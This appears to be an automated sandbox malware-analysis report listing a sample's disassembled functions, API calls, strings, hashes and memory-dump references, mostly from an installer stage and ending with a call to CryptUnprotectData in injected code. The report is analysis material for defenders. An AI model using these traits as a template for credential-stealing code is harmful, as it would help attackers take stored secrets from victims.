Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
Opcode Fuzzy Hash: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000C98C2,00000064,000C98C6), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98

Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
wsprintfW.USER32 ref: 00404B52
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

6B, xrefs: 00404B3B
%u.%u%s%s, xrefs: 00404B33

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
Opcode Fuzzy Hash: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(nerveklinikkernes,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini, xrefs: 004025E1
nerveklinikkernes, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$nerveklinikkernes
API String ID: 3109718747-1405770578
Opcode ID: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
Opcode Fuzzy Hash: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E

Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
GetLastError.KERNEL32 ref: 00405812
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
GetLastError.KERNEL32 ref: 00405831

Strings

C:\Users\user\Desktop, xrefs: 004057BB

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3080008178
Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
Instruction ID: fd95e7d74cf6809d4f8eb1fd1b0c41c525f08b7aa6685e2bd119da418b5cf1ce
Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
Instruction Fuzzy Hash: 61011A72D00219DADF009FA0CD447EFBBB4EF14305F00803AD944B6280DB789658CFA9

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28

Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-2145255484
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC

Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040528F
CallWindowProcW.USER32(?,?,?,?), ref: 004052E0

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Strings

, xrefs: 00405270

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69

Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
GlobalFree.KERNEL32(?), ref: 00403900

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-2145255484
Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8

Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB

Strings

C:\Users\user\Desktop, xrefs: 00405BA5

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3080008178
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC

Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

Analysis Process: Bivejens.exePID: 8056, Parent PID: 6464COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.4%
Total number of Nodes:	183
Total number of Limit Nodes:	18

Executed Functions

Function 00159E83 Relevance: 2.2, Strings: 1, Instructions: 987COMMON

Download Yara Rule

Strings

T, xrefs: 00159E86

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-3187964512
Opcode ID: 208a8b21e12400e26abde4918531182b79e5e1632a2c95b903859533c63dc981
Instruction ID: 0c4b56fb2abe15c6cab8b6d417fb471e47c092efd709390e6d6ab0016433eb55
Opcode Fuzzy Hash: 208a8b21e12400e26abde4918531182b79e5e1632a2c95b903859533c63dc981
Instruction Fuzzy Hash: 70829330A44209CFCB15CFA8C984AAEBBF2BF88311F558655E815DF261D734ED89CB52

Function 21099548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ed685944a529aa8b835e050427faba1336177c1df60ff9b9df5aab249526ab
Instruction ID: 082d9d0c383e44e4a904040c2fb4c7777696f69ef2b80d776efe343f707e85eb
Opcode Fuzzy Hash: 30ed685944a529aa8b835e050427faba1336177c1df60ff9b9df5aab249526ab
Instruction Fuzzy Hash: D3F1E474E00218CFDB14DFA9D884B9DFBB2BF88304F5481AAE848AB355DB759985CF50

Function 219187A8 Relevance: 1.6, APIs: 1, Instructions: 55
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 21918F5D

Memory Dump Source

Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 1ed035bb379bd7d6bbe830b0cb12e76c2667621ef471dcc3a13233baea59f147
Instruction ID: 343d3e783838a4e17f166e9b5081a4e1e949b59b3bd36017c74d080fdb90931b
